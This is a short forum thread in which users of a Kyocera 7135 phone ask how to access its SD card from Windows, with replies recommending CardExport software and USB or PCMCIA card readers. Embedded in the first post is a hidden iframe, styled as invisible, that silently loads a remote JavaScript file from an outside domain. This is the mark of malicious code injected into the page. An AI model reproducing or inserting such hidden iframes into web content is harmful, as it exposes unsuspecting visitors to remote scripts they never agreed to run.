turn SD card into a drive in WIndows?

Is anyone using a program that allows you to access your 7135's SD card slot directly from Windows Explorer?

    Thanks!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I have not seen a program that will allow you to treat the SD card while in the 7135 as a separate drive in Windows. However, if you combine the SD card with a card reader, it will show up as a drive in "my computer".

    CardExport by SoftTick

There is some great software to use the phone as a USB card reader/writer called CardExport by SoftTick. It's so much faster than HotSync, but Unfortunately, it only works on Win2K and Win XP.

I don't know about being able to use the phone as the hardware device, but the Cruizer is a cheap way to turn your SD card into a USB drive. There are also PCMCIA cards that will accept SD cards-- I've got one that takes 4 different media types, including Sony MemoryStick and SD... All of a sudden, my tiny 4MB memorystick isn't so small any more.

Yeah, a USB SD card reader shows up as a removable drive in Windows after you plug ti in. No software needed (provided your Windows recognizes USB drives).
